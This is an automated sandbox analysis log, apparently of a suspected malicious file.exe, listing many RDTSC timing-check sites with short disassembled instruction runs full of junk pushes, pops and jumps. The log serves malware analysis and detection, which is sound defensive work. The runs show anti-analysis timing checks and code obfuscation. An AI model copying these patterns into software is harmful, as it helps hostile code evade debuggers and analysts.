              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DECB second address: 92DED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DED1 second address: 92DF16 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7B8E46E48h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 61A8434Ah 0x00000013 lea ebx, dword ptr [ebp+12454C3Bh] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FC7B8E46E48h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov di, 2E2Ch 0x00000037 push eax 0x00000038 je 00007FC7B8E46E61h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E185 second address: 92E189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E189 second address: 92E24B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D31FBh], ebx 0x00000013 push 00000000h 0x00000015 jmp 00007FC7B8E46E51h 0x0000001a push 99D63D9Dh 0x0000001f jne 00007FC7B8E46E5Ch 0x00000025 jmp 00007FC7B8E46E56h 0x0000002a add dword ptr [esp], 6629C2E3h 0x00000031 or edx, 11B783C0h 0x00000037 and ecx, dword ptr [ebp+122D3B6Fh] 0x0000003d push 00000003h 0x0000003f add dh, FFFFFFE6h 0x00000042 push 00000000h 0x00000044 xor esi, dword ptr [ebp+122D1FBFh] 0x0000004a push 00000003h 0x0000004c and edx, dword ptr [ebp+122D3BA7h] 0x00000052 push F23C394Fh 0x00000057 jng 00007FC7B8E46E4Eh 0x0000005d xor dword ptr [esp], 323C394Fh 0x00000064 mov di, bx 0x00000067 lea ebx, dword ptr [ebp+12454C4Fh] 0x0000006d pushad 0x0000006e sub bl, 00000020h 0x00000071 call 00007FC7B8E46E51h 0x00000076 pushad 0x00000077 popad 0x00000078 pop edi 0x00000079 popad 0x0000007a mov esi, dword ptr [ebp+122D3847h] 0x00000080 xchg eax, ebx 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 js 00007FC7B8E46E46h 0x0000008b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E24B second address: 92E255 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC7B8E88BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E255 second address: 92E27D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7B8E46E51h 0x00000008 jno 00007FC7B8E46E46h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007FC7B8E46E48h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C19E second address: 94C1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C307 second address: 94C30D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C44E second address: 94C454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C454 second address: 94C458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C458 second address: 94C468 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC7B8E88BF6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C717 second address: 94C72E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7B8E46E4Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CC79 second address: 94CC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CDB5 second address: 94CDC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CDC0 second address: 94CDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CDC6 second address: 94CDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jng 00007FC7B8E46E46h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC7B8E46E4Dh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CF44 second address: 94CF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CF48 second address: 94CF51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D0A7 second address: 94D0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944181 second address: 94418A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B2B8 second address: 91B2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B2BC second address: 91B2DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FC7B8E46E55h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B2DE second address: 91B2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC7B8E88C04h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B2FA second address: 91B300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B300 second address: 91B31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push ecx 0x00000009 jmp 00007FC7B8E88BFBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FC7B8E88BF6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B31C second address: 91B326 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7B8E46E46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D8C0 second address: 94D8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jbe 00007FC7B8E88BF6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D8CE second address: 94D8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007FC7B8E46E57h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94DCFD second address: 94DD02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94DD02 second address: 94DD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94DFE0 second address: 94DFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94DFE7 second address: 94E000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC7B8E46E46h 0x0000000a jmp 00007FC7B8E46E4Fh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E000 second address: 94E004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E004 second address: 94E03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC7B8E46E56h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC7B8E46E56h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94FD43 second address: 94FD4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC7B8E88BF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951405 second address: 951454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC7B8E46E46h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC7B8E46E59h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 js 00007FC7B8E46E5Bh 0x0000001b jmp 00007FC7B8E46E55h 0x00000020 mov eax, dword ptr [eax] 0x00000022 jnp 00007FC7B8E46E54h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951454 second address: 95145A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95145A second address: 95146E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jl 00007FC7B8E46E46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95146E second address: 951473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951473 second address: 95147D instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7B8E46E4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9526CB second address: 9526E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC7B8E88BF6h 0x0000000a popad 0x0000000b jbe 00007FC7B8E88BFAh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 ja 00007FC7B8E88BF6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9526E9 second address: 952707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007FC7B8E46E50h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 952707 second address: 95270D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912BD9 second address: 912BEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007FC7B8E46E46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9197A7 second address: 9197AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959A08 second address: 959A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007FC7B8E46E4Eh 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007FC7B8E46E46h 0x00000016 jmp 00007FC7B8E46E50h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959A32 second address: 959A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959A36 second address: 959A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959BA3 second address: 959BAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959BAC second address: 959BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC7B8E46E46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959BB8 second address: 959BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959BC5 second address: 959BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959BC9 second address: 959BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88BFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959BDB second address: 959BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959BDF second address: 959BEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959BEB second address: 959BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959D6B second address: 959D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A06E second address: 95A0B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC7B8E46E59h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FC7B8E46E4Bh 0x00000018 popad 0x00000019 jbe 00007FC7B8E46E50h 0x0000001f jmp 00007FC7B8E46E4Ah 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A321 second address: 95A352 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C05h 0x00000007 jmp 00007FC7B8E88C04h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95ADA9 second address: 95ADAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95ADAD second address: 95ADBF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC7B8E88BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AEFA second address: 95AF04 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7B8E46E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B15E second address: 95B17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E88BFFh 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jbe 00007FC7B8E88BF6h 0x00000015 pop edi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B912 second address: 95B95C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC7B8E46E48h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jmp 00007FC7B8E46E59h 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c push ebx 0x0000002d pushad 0x0000002e popad 0x0000002f pop ebx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B95C second address: 95B97F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7B8E88C06h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B97F second address: 95B989 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7B8E46E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BB1B second address: 95BB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BC4A second address: 95BC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BEDC second address: 95BEE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BEE1 second address: 95BEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BEF0 second address: 95BEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BFD7 second address: 95C029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC7B8E46E48h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FC7B8E46E57h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C029 second address: 95C033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC7B8E88BF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C033 second address: 95C037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C4CE second address: 95C4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CCFE second address: 95CD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E001 second address: 95E007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E007 second address: 95E00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E00B second address: 95E0CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FC7B8E88BFEh 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 jmp 00007FC7B8E88BFAh 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007FC7B8E88BF8h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 jmp 00007FC7B8E88C06h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 jg 00007FC7B8E88BFCh 0x00000046 xchg eax, ebx 0x00000047 pushad 0x00000048 jmp 00007FC7B8E88C06h 0x0000004d jmp 00007FC7B8E88C08h 0x00000052 popad 0x00000053 push eax 0x00000054 pushad 0x00000055 pushad 0x00000056 pushad 0x00000057 popad 0x00000058 pushad 0x00000059 popad 0x0000005a popad 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E8CD second address: 95E8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E8D2 second address: 95E8D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962C59 second address: 962C8F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC7B8E46E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC7B8E46E55h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC7B8E46E53h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962C8F second address: 962D13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx esi, ax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FC7B8E88BF8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 xor esi, 624BFBCAh 0x0000002f sbb si, 43A9h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FC7B8E88BF8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov edi, 08E1953Dh 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 jne 00007FC7B8E88BF6h 0x0000005f pop edi 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962D13 second address: 962D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7B8E46E53h 0x00000009 rdtsc
